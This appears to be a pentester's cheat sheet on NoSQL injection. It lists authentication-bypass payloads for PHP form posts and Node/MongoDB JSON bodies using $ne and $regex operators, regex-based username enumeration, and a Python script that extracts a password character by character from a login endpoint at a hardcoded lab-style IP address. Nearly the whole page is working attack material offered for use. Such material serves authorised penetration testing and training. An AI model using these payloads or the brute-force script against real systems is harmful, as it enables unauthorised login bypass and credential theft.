NoSQL Injection
PHP
##-----| Content-Type: application/x-www-form-urlencoded
admin'||'1==1
username[$ne]=admin&password[$ne]=pass
# With regex; increase x++
## Count username's character
username[$regex]=^.{x}$&password[$ne]=pass
## Bruteforce username; change x to a,b,c,d...
username[$regex]=^{x}.*&password[$ne]=pass
Node / MongoDB
##-----| Content-Type: application/json
{
"user" : "admin",
"password" : { "$ne" : "passw"}
}
{
"username" : { "$ne" : "admin"},
"password" : { "$ne" : "passw"}
}
{
"user" : "admin",
"password" : { "$regex" : ".*"}
}
Bruteforce login password
import sys
import json
import string
import requests as req
proxies = { 'http': 'http://127.0.0.1:8080' }
url = "http://10.10.11.139:5000/login"
par_user = "user"
par_user_value = "admin"
par_pass = "password"
fail_respond = "Invalid"
def login(passwd):
payload = '{ "$regex": "%s" }' % passwd
data = { par_user:par_user_value, par_pass: json.loads(payload)}
request = req.post(url,json=data) #, proxies=proxies)
if fail_respond in request.text:
return False
return True
passwd = '^'
finished = False
string = string.ascii_letters + string.digits + string.punctuation
while finished == False:
for i in string:
sys.stdout.write(f"\r{passwd}{i}")
if login(f"{passwd}{i}"):
passwd += i
if login(f"{passwd}$"):
print ("\r\n\nPassword is : "+ passwd[1:])
finished = True
break
break
Last updated